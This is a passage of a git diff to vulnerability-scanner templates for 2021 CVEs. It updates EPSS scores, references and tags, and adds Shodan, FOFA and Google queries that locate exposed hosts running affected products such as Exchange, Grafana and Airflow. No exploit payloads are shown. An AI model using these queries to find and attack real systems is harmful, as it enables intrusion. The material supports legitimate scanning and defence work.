cvss-score: 7.5 cve-id: CVE-2021-33807 cwe-id: CWE-22 - epss-score: 0.02187 - epss-percentile: 0.89167 + epss-score: 0.02481 + epss-percentile: 0.9007 cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index eae0b6e411..d52387d771 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-33851 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.2831 + epss-percentile: 0.29862 cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index 07c7216ed5..e3e8e65858 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-33904 cwe-id: CWE-79 epss-score: 0.00182 - epss-percentile: 0.54617 + epss-percentile: 0.55425 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index 549950afe5..ee42609eb1 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -28,6 +28,7 @@ info: max-request: 2 vendor: eclipse product: jetty + shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" tags: cve2021,cve,jetty,eclipse http: diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index a90d67b335..9cdf5d3cbc 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: microsoft product: exchange_server + shodan-query: vuln:cve-2021-26855 + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft http: diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 7dd6ecef37..579b5f4fe4 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -14,13 +14,14 @@ info: - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640 - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628 - https://nvd.nist.gov/vuln/detail/CVE-2021-34640 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-34640 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.45185 + epss-score: 0.00123 + epss-percentile: 0.46682 cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 8dfd2c16cb..edb34639c5 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-34643 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.44405 + epss-score: 0.00123 + epss-percentile: 0.46682 cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index ab9cf50e5d..7d19335562 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-34805 cwe-id: CWE-22 epss-score: 0.17035 - epss-percentile: 0.95944 + epss-percentile: 0.96066 cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 2f70ac4c8c..824eabf5ff 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-35250 cwe-id: CWE-22 epss-score: 0.05835 - epss-percentile: 0.93245 + epss-percentile: 0.93393 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 8c4716f1d2..9f273821c2 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -21,14 +21,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-35265 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47461 + epss-score: 0.00141 + epss-percentile: 0.4979 cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: maxsite product: maxsite_cms shodan-query: html:'content="MaxSite CMS' + fofa-query: body='content="maxsite cms' tags: cve2021,cve,maxsite,xss http: diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 3ee693b34b..a3a2c59b8f 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -19,13 +19,13 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35336 cwe-id: CWE-1188 - epss-score: 0.0793 - epss-percentile: 0.94105 - cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:* + epss-score: 0.13449 + epss-percentile: 0.95592 + cpe: cpe:2.3:h:tieline:ip_audtio_gateway:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tieline - product: ip_audtio_gateway_firmware + product: ip_audtio_gateway tags: cve2021,cve,tieline,default-login http: diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index b585dcd25f..ec4e437cda 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -12,12 +12,13 @@ info: - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities - https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en - https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf + - https://github.com/Knighthana/YABWF classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-35395 - epss-score: 0.97119 - epss-percentile: 0.99744 + epss-score: 0.96911 + epss-percentile: 0.99713 cpe: cpe:2.3:a:realtek:realtek_jungle_sdk:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index a610fcbce1..55637663fe 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -24,14 +24,16 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35464 cwe-id: CWE-502 - epss-score: 0.97262 - epss-percentile: 0.99826 + epss-score: 0.97398 + epss-percentile: 0.99918 cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: forgerock product: am shodan-query: http.title:"OpenAM" + fofa-query: title="openam" + google-query: intitle:"openam" tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock http: diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index bb60f03561..f674842e2d 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-35488 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.49429 + epss-percentile: 0.50266 cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: thruk product: thruk shodan-query: http.html:"Thruk" + fofa-query: body="thruk" tags: cve2021,cve,thruk,xss http: diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 88fe555cd4..0f839ba7da 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -31,6 +31,7 @@ info: product: access_manager shodan-query: http.title:"Oracle Access Management" fofa-query: body="/oam/pages/css/login_page.css" + google-query: intitle:"oracle access management" tags: cve2021,cve,oam,rce,java,unauth,oracle,kev http: diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index c46469508c..765fb91c1e 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -13,13 +13,15 @@ info: - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577 - https://binatoneglobal.com/security-advisory/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-3577 cwe-id: CWE-863,CWE-78 - epss-score: 0.96689 - epss-percentile: 0.99568 + epss-score: 0.95748 + epss-percentile: 0.99426 cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index abbbf9a55e..b69a735ba2 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -28,8 +28,8 @@ info: vendor: hikvision product: ds-2cd2026g2-iu\/sl_firmware shodan-query: http.favicon.hash:999357577 + fofa-query: icon_hash=999357577 tags: cve2021,cve,hikvision,rce,iot,intrusive,kev - variables: string: "{{to_lower(rand_base(12))}}" diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 8dbb5f01fd..2fe2767c5d 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - epss-score: 0.90558 - epss-percentile: 0.98752 + epss-score: 0.88569 + epss-percentile: 0.98691 cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 52303c4a3f..3d92b2e17f 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -13,19 +13,21 @@ info: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ - https://nvd.nist.gov/vuln/detail/CVE-2021-36380 - https://www.sunhillo.com/product/sureline/ + - https://github.com/Ostorlab/KEV + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-36380 cwe-id: CWE-78 - epss-score: 0.97166 - epss-percentile: 0.99767 + epss-score: 0.97494 + epss-percentile: 0.99977 cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sunhillo product: sureline - tags: cve2021,cve,sureline,rce,oast,sunhillo + tags: cve2021,cve,sureline,rce,oast,sunhillo,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 9b1384b83b..3daed29755 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -29,6 +29,8 @@ info: vendor: verint product: workforce_optimization shodan-query: title:"Verint Sign-in" + fofa-query: title="verint sign-in" + google-query: intitle:"verint sign-in" tags: cve2021,cve,xss,verint http: diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 8aa4290aa7..7e66333de3 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-3654 cwe-id: CWE-601 - epss-score: 0.92596 - epss-percentile: 0.98944 + epss-score: 0.92607 + epss-percentile: 0.98994 cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index a64f0801ce..c64bd33fa8 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-36580 cwe-id: CWE-601 epss-score: 0.00233 - epss-percentile: 0.60652 + epss-percentile: 0.6129 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: icewarp product: icewarp_server shodan-query: title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve2021,cve,icewarp,redirect http: diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index b0fbfc8323..091c47d40d 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-36748 cwe-id: CWE-89 - epss-score: 0.0061 - epss-percentile: 0.78175 + epss-score: 0.00445 + epss-percentile: 0.74932 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index b104b46306..ce177301df 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-37304 cwe-id: CWE-732 epss-score: 0.00703 - epss-percentile: 0.79899 + epss-percentile: 0.80284 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" + google-query: intitle:"jeecg-boot" tags: cve2021,cve,jeecg,exposure http: diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index cedd33c523..72ca741e39 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -28,6 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" + google-query: intitle:"jeecg-boot" tags: cve2021,cve,jeecg,exposure http: diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 7f39e871e9..2706cdd862 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-37416 cwe-id: CWE-79 - epss-score: 0.00118 - epss-percentile: 0.44933 + epss-score: 0.00149 + epss-percentile: 0.51001 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: zohocorp product: manageengine_adselfservice_plus shodan-query: http.title:"ManageEngine" + fofa-query: title="manageengine" + google-query: intitle:"adselfservice plus" tags: cve2021,cve,zoho,xss,zohocorp http: diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 6719103fb9..3ee7325bae 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-37573 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.69043 + epss-percentile: 0.69609 cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 22a54ec1c7..6e86dbf827 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -14,13 +14,14 @@ info: - https://github.com/fengwenhua/CVE-2021-37580 - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb - http://www.openwall.com/lists/oss-security/2021/11/16/1 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-37580 cwe-id: CWE-287 - epss-score: 0.91956 - epss-percentile: 0.9872 + epss-score: 0.92774 + epss-percentile: 0.99015 cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index a7ffd6b5a4..c045da6fdf 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -15,13 +15,14 @@ info: - https://www.virtuasoftware.com.br/ - https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br - https://nvd.nist.gov/vuln/detail/CVE-2021-37589 + - https://github.com/luca-regne/public-exploits classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-37589 cwe-id: CWE-89 - epss-score: 0.00661 - epss-percentile: 0.77395 + epss-score: 0.0114 + epss-percentile: 0.84701 cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,7 @@ info: vendor: virtuasoftware product: cobranca shodan-query: http.favicon.hash:876876147 + fofa-query: icon_hash=876876147 tags: cve,cve2021,virtua,sqli,virtuasoftware http: diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 424a0a1b8c..9930c91415 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.3 cve-id: CVE-2021-37704 cwe-id: CWE-668,CWE-200 - epss-score: 0.00547 - epss-percentile: 0.76969 + epss-score: 0.0062 + epss-percentile: 0.78796 cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index b1532b1692..347f5ab75d 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -20,13 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-37833 cwe-id: CWE-79 - epss-score: 0.0019 - epss-percentile: 0.55493 + epss-score: 0.00287 + epss-percentile: 0.6875 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:* metadata: max-request: 4 vendor: digitaldruid product: hoteldruid + shodan-query: http.title:"hoteldruid" + fofa-query: title="hoteldruid" + google-query: intitle:"hoteldruid" tags: cve2021,cve,hoteldruid,xss,digitaldruid http: diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 4b7c585909..c2fccad391 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-38540 cwe-id: CWE-306,CWE-269 - epss-score: 0.01445 - epss-percentile: 0.8529 + epss-score: 0.01603 + epss-percentile: 0.87397 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: apache product: airflow shodan-query: title:"Sign In - Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve2021,cve,apache,airflow,rce,intrusive http: diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index 4eb207348f..506d8feeaa 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 - http://www.cyberoamworks.com/NetGenie-Home.asp - http://packetstormsecurity.com/files/163859/Cyberoam-NetGenie-Cross-Site-Scripting.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 - epss-score: 0.00626 - epss-percentile: 0.76687 + epss-score: 0.01053 + epss-percentile: 0.84023 cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 4973f46fed..32919c3b3f 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-38704 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.48901 + epss-score: 0.0015 + epss-percentile: 0.5117 cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cliniccases product: cliniccases shodan-query: http.title:"ClinicCases",html:"/cliniccases/" + fofa-query: title="cliniccases",html:"/cliniccases/" + google-query: intitle:"cliniccases",html:"/cliniccases/" tags: cve,cve2021,xss,cliniccases http: diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 5384a41c12..981649fa78 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-39165 cwe-id: CWE-287 - epss-score: 0.04786 - epss-percentile: 0.92528 + epss-score: 0.04209 + epss-percentile: 0.92226 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: chachethq product: cachet shodan-query: http.favicon.hash:-1606065523 + fofa-query: icon_hash=-1606065523 tags: cve,cve2021,cachet,sqli,chachethq http: diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index bf41c7f981..c5a4ea9ab3 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -19,13 +19,16 @@ info: cvss-score: 5.3 cve-id: CVE-2021-39211 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.00161 - epss-percentile: 0.51768 + epss-score: 0.00126 + epss-percentile: 0.47223 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: glpi-project product: glpi + shodan-query: http.title:"glpi" + fofa-query: icon_hash="-1474875778" + google-query: intitle:"glpi" tags: cve,cve2021,glpi,exposure,glpi-project http: diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 62889d9a0e..6ffd29adeb 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -27,6 +27,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2021,cve,grafana,kev http: diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 77710a19be..9c48a5c1ab 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-39320 cwe-id: CWE-79 - epss-score: 0.0021 - epss-percentile: 0.58322 + epss-score: 0.00228 + epss-percentile: 0.60903 cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index dad8ac22ba..5bddc86dcb 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-39433 - epss-score: 0.00637 - epss-percentile: 0.78687 + epss-score: 0.00688 + epss-percentile: 0.80055 cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 82b8c6507e..5673dc3ced 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: eyoucms product: eyoucms + fofa-query: title="eyoucms" tags: cve2021,cve,redirect,eyoucms,cms http: diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index 2a6f0f19df..adbe2c9f08 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -30,6 +30,8 @@ info: vendor: reolink product: e1_zoom_firmware shodan-query: http.title:"Reolink" + fofa-query: title="reolink" + google-query: intitle:"reolink" tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot http: diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 2cbbd16b00..739563d63a 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -30,6 +30,8 @@ info: vendor: reolink product: e1_zoom_firmware shodan-query: http.title:"Reolink" + fofa-query: title="reolink" + google-query: intitle:"reolink" tags: cve2021,cve,reolink,camera,exposure,iot http: diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 59ab065e1c..bd5031e0cc 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40323 cwe-id: CWE-94 - epss-score: 0.03051 - epss-percentile: 0.90763 + epss-score: 0.03304 + epss-percentile: 0.91311 cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cobbler_project product: cobbler + shodan-query: http.title:"cobbler web interface" + fofa-query: title="cobbler web interface" + google-query: intitle:"cobbler web interface" tags: cve,cve2021,cobbler,rce,cobbler_project http: diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index e2fb207a28..c55c863ca9 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -17,14 +17,15 @@ info: cvss-score: 9 cve-id: CVE-2021-40438 cwe-id: CWE-918 - epss-score: 0.97372 - epss-percentile: 0.99897 + epss-score: 0.97446 + epss-percentile: 0.99948 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve2021,cve,ssrf,apache,mod-proxy,kev http: diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 21c1f7b32e..75165cd98f 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -19,13 +19,16 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40539 cwe-id: CWE-706 - epss-score: 0.97499 - epss-percentile: 0.99976 + epss-score: 0.97492 + epss-percentile: 0.99975 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:* metadata: max-request: 4 vendor: zohocorp product: manageengine_adselfservice_plus + shodan-query: http.title:"manageengine" + fofa-query: title="manageengine" + google-query: intitle:"adselfservice plus" tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp http: diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index d212ac1c29..f814c685c7 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: 